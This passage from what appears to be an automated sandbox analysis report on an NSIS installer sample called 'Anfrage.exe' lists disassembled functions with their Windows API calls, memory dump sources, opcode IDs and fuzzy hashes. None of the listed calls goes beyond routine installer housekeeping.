                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                          • String ID:
                                                                          • API String ID: 2667972263-0
                                                                          • Opcode ID: 45c976d1f9efa3b673be8bfb29733d3aa1598ede0f13eddfd8cf1085deaf7a0d
                                                                          • Instruction ID: 571a6d001cc63de597daa7fe39824babb5321d0f4a9ee8e37ed24c69abe451e8
                                                                          • Opcode Fuzzy Hash: 45c976d1f9efa3b673be8bfb29733d3aa1598ede0f13eddfd8cf1085deaf7a0d
                                                                          • Instruction Fuzzy Hash: 62219C71800128BBCF217FA5CE89D9E7A79EF09324F14423AF551762E1CA794941DFA8
                                                                          Function 1000180D Relevance: 7.7, APIs: 5, Instructions: 189COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.2139512227.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139550102.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139589277.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: FreeGlobal
                                                                          • String ID:
                                                                          • API String ID: 2979337801-0
                                                                          • Opcode ID: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
                                                                          • Instruction ID: adaf369aa6dab84e94bee76403d526b7d43184adb12fe210256c1aedb67fe499
                                                                          • Opcode Fuzzy Hash: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
                                                                          • Instruction Fuzzy Hash: 43512536D04159AEFB55DFB488A4AEEBBF6EF453C0F124169E841B315DCA306E4087D2
                                                                          Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?), ref: 00401D3F
                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                                                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                                                          • DeleteObject.GDI32(00000000), ref: 00401D8A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                          • String ID:
                                                                          • API String ID: 1849352358-0
                                                                          • Opcode ID: b9866fc206b3e1f2001e4087a8a8d6ef2e3fb8e7fd47bad3a68fd0200ce6cc51
                                                                          • Instruction ID: 59b50efb9a894631b7e7ef6fc31e4c4877b28631b56f020e773a3ce1da8bb2e7
                                                                          • Opcode Fuzzy Hash: b9866fc206b3e1f2001e4087a8a8d6ef2e3fb8e7fd47bad3a68fd0200ce6cc51
                                                                          • Instruction Fuzzy Hash: 6EF0FFB2600519BFD700EBA4DF88DAFB7BCEB44301B10447AF641F2191CA749D018B38
                                                                          Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Timeout
                                                                          • String ID: !
                                                                          • API String ID: 1777923405-2657877971
                                                                          • Opcode ID: 028af5dbbf2e27154293e1be7a1693a126019fa8c38554a83be992bc88fc6b23
                                                                          • Instruction ID: c229e225b91697c78ff11bbf30ef832f008d48f992f947ceaaf7a44b37239d7f
                                                                          • Opcode Fuzzy Hash: 028af5dbbf2e27154293e1be7a1693a126019fa8c38554a83be992bc88fc6b23
                                                                          • Instruction Fuzzy Hash: E921A271A44208BEEB15EFA4DA46AED7FB1EF84314F24403EF101B61D1DA788640DB28
                                                                          Function 0040479D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(0042A868,0042A868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046B8,000000DF,00000000,00000400,?), ref: 0040483B
                                                                          • wsprintfA.USER32 ref: 00404843
                                                                          • SetDlgItemTextA.USER32(?,0042A868), ref: 00404856
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                          • String ID: %u.%u%s%s
                                                                          • API String ID: 3540041739-3551169577
                                                                          • Opcode ID: 87a759055d291fd877383144180c8e5bed6145313cb5bdff1d542eccde70147e
                                                                          • Instruction ID: 1726a7b3b84a2b44988fbd512cc110d638b221a6b4b1acd42f263589eafed974
                                                                          • Opcode Fuzzy Hash: 87a759055d291fd877383144180c8e5bed6145313cb5bdff1d542eccde70147e
                                                                          • Instruction Fuzzy Hash: D611E4736041282BEB00666D9C45EEF3698DB86374F244237FA25F31D1EA78CC1286E8
                                                                          Function 00403A08 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowTextA.USER32(00000000,Hves Setup), ref: 00403AA0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: TextWindow
                                                                          • String ID: "C:\Users\user\Desktop\Anfrage.exe"$1033$Hves Setup
                                                                          • API String ID: 530164218-2606437607
                                                                          • Opcode ID: 96401226afcf46c978deea678981fff0f7e57d07aa73fd903f01d42c88786375
                                                                          • Instruction ID: b04f25c42bae21d45f40ba66b929719106617fb277c5c9e4054ff8f425243e64
                                                                          • Opcode Fuzzy Hash: 96401226afcf46c978deea678981fff0f7e57d07aa73fd903f01d42c88786375
                                                                          • Instruction Fuzzy Hash: 1811A431B005109BC720EF55DC8097777ACEF94759758813BE841A7391D6399D038E68
                                                                          Function 00405835 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403190,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 0040583B
                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403190,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 00405844
                                                                          • lstrcatA.KERNEL32(?,0040A014), ref: 00405855
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405835
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 2659869361-4083868402
                                                                          • Opcode ID: 178b6ada5e076015f485ca613ecf1787b7cf1381da79526f7687ddfe4de49248
                                                                          • Instruction ID: 43d0cd13a6a684b33c4c302d476afec45ae212270d2ea225269fd4ac386bbf9e
                                                                          • Opcode Fuzzy Hash: 178b6ada5e076015f485ca613ecf1787b7cf1381da79526f7687ddfe4de49248
                                                                          • Instruction Fuzzy Hash: 46D0A9A2201A302AE20237158C09ECB2A08CF12316B04803BF202B21A1CA7D0D428BFE
                                                                          Function 00401B5D Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GlobalFree.KERNEL32(00665A78), ref: 00401BCC
                                                                          • GlobalAlloc.KERNEL32(00000040,00000404), ref: 00401BDE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree
                                                                          • String ID: Call$xZf
                                                                          • API String ID: 3394109436-1563588713
                                                                          • Opcode ID: 382e83497b6452e7c65802fe1326a2029af183ce9cf88f464a37c6325ccb903e
                                                                          • Instruction ID: d054425cb323db0c5527465b0d1f96526ab7a24d54a529c5f55500c1511f63c4
                                                                          • Opcode Fuzzy Hash: 382e83497b6452e7c65802fe1326a2029af183ce9cf88f464a37c6325ccb903e
                                                                          • Instruction Fuzzy Hash: AB2184726002159BD710ABA49E88E5E77E9DB44314B28883BF241B33D1D77999018F6D
                                                                          Function 00402C96 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(00000000,00000000,00402E76,00000001), ref: 00402CA9
                                                                          • GetTickCount.KERNEL32 ref: 00402CC7
                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402C13,00000000), ref: 00402CE4
                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402CF2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                          • String ID:
                                                                          • API String ID: 2102729457-0
                                                                          • Opcode ID: 7c95322a2218cd30271dcbbb025a48105d342dcc5512f67fa7608e428122dd6b
                                                                          • Instruction ID: 83d2969b76bdb5b590415ddeb9dbf6a67b394939c3bc7fdf3e8ca1fe09a6ce6e
                                                                          • Opcode Fuzzy Hash: 7c95322a2218cd30271dcbbb025a48105d342dcc5512f67fa7608e428122dd6b
                                                                          • Instruction Fuzzy Hash: 4CF05E31605620ABD6217B20FF0C99F7BA4B714B45B81057EF045B21F8CB7818868B9C
                                                                          Function 00405923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00405DC3: lstrcpynA.KERNEL32(?,?,00000400,00403251,Hves Setup,NSIS Error), ref: 00405DD0
                                                                            • Part of subcall function 004058CE: CharNextA.USER32(?,?,0042BC70,?,0040593A,0042BC70,0042BC70,75573410,?,C:\Users\user\AppData\Local\Temp\,00405685,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058DC
                                                                            • Part of subcall function 004058CE: CharNextA.USER32(00000000), ref: 004058E1
                                                                            • Part of subcall function 004058CE: CharNextA.USER32(00000000), ref: 004058F5
                                                                          • lstrlenA.KERNEL32(0042BC70,00000000,0042BC70,0042BC70,75573410,?,C:\Users\user\AppData\Local\Temp\,00405685,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405976
                                                                          • GetFileAttributesA.KERNEL32(0042BC70,0042BC70,0042BC70,0042BC70,0042BC70,0042BC70,00000000,0042BC70,0042BC70,75573410,?,C:\Users\user\AppData\Local\Temp\,00405685,?,75573410,C:\Users\user\AppData\Local\Temp\), ref: 00405986
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405923
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 3248276644-4083868402
                                                                          • Opcode ID: 2dd11022cd3804a0f23826d58d53fd3ba18c85e64f763ac6aee612c12e1a2a27
                                                                          • Instruction ID: 92543aceb9d73041788eed49261eabef0250a74612a1112b20cd45f7194ba1aa
                                                                          • Opcode Fuzzy Hash: 2dd11022cd3804a0f23826d58d53fd3ba18c85e64f763ac6aee612c12e1a2a27
                                                                          • Instruction Fuzzy Hash: 2FF0F466104E51A2C222333A1C09E9F0A18CE43374719453FFCA1B62C2DB3C8D569DBE
                                                                          Function 004036AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(?,75573410,00000000,C:\Users\user\AppData\Local\Temp\,00403686,004034A0,?), ref: 004036C8
                                                                          • GlobalFree.KERNEL32(0065B5C0), ref: 004036CF
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004036AE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Free$GlobalLibrary
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 1100898210-4083868402
                                                                          • Opcode ID: 1bad914f96c97a74accc372815b9fc60e9a0461e25a509c21ecbd9517d8462b1
                                                                          • Instruction ID: 9fca1652fb000c4b705c35b2fab9dc87deb0b29542395ee28e6d3d9d92831ef3
                                                                          • Opcode Fuzzy Hash: 1bad914f96c97a74accc372815b9fc60e9a0461e25a509c21ecbd9517d8462b1
                                                                          • Instruction Fuzzy Hash: B8E08C32A2102067CA312F54EE0472A7BAC6F49B22F09046AE9807B3608B755C424BCC
                                                                          Function 0040587C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Anfrage.exe,C:\Users\user\Desktop\Anfrage.exe,80000000,00000003), ref: 00405882
                                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Anfrage.exe,C:\Users\user\Desktop\Anfrage.exe,80000000,00000003), ref: 00405890
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrevlstrlen
                                                                          • String ID: C:\Users\user\Desktop
                                                                          • API String ID: 2709904686-1876063424
                                                                          • Opcode ID: a9e0b15de56eef468385f8c6f647f59dc691c576a1137d19596c50b040f8bf1b
                                                                          • Instruction ID: 2ed5ef101b5713daa1f548366255804a524b1aabb415f21906ff2d2d9e5555c3
                                                                          • Opcode Fuzzy Hash: a9e0b15de56eef468385f8c6f647f59dc691c576a1137d19596c50b040f8bf1b
                                                                          • Instruction Fuzzy Hash: C3D0A763408D701EF30363108C04B9F7A48DF12300F0940B2E481A2190C6BC0C424BBD
                                                                          Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                          • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                          • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.2139512227.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139550102.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139589277.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc
                                                                          • String ID:
                                                                          • API String ID: 1780285237-0
                                                                          • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                          • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                          • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                          • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                          Function 0040599B Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BF8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059AB
                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004059C3
                                                                          • CharNextA.USER32(00000000,?,00000000,00405BF8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059D4
                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405BF8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059DD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 190613189-0
                                                                          • Opcode ID: a2c52c9a51a2c87d3959497fa160f4ebe8f2eb417ab2d749973a894cf6308a94
